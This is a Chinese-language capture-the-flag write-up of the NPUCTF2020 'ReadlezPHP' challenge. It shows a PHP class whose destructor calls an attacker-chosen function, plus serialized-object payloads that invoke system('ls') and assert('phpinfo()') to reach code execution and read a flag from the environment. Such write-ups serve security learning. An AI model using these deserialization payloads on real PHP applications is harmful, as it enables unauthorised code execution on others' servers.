[NPUCTF2020]ReadlezPHP（学习）.md

---

首页长这样

查看前端代码，尝试寻找注入

/time.php?source

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

看样子是个简单的反序列化，尝试以下payload

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:2:"ls";s:1:"b";s:6:"system";}

并没有反应，看来是system被ban了

eval作为特殊形式，本身不是函数，所以不能使用

尝试用file_get_contents读出和构造匿名函数，结果都失败了QAQ，一是不知道flag在什么文件里，二是匿名函数不能序列化

看网上大佬用的assert才想起来还有这玩意

flag不知道在哪个文件里，答案是作为环境变量了，要通过phpinfo()获得

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

这个在本地机上咋也跑不起来QAQ，然后查文档发现是本地机php版本太高了

#Web #PHP #反序列化 #bypass #assert #function #环境变量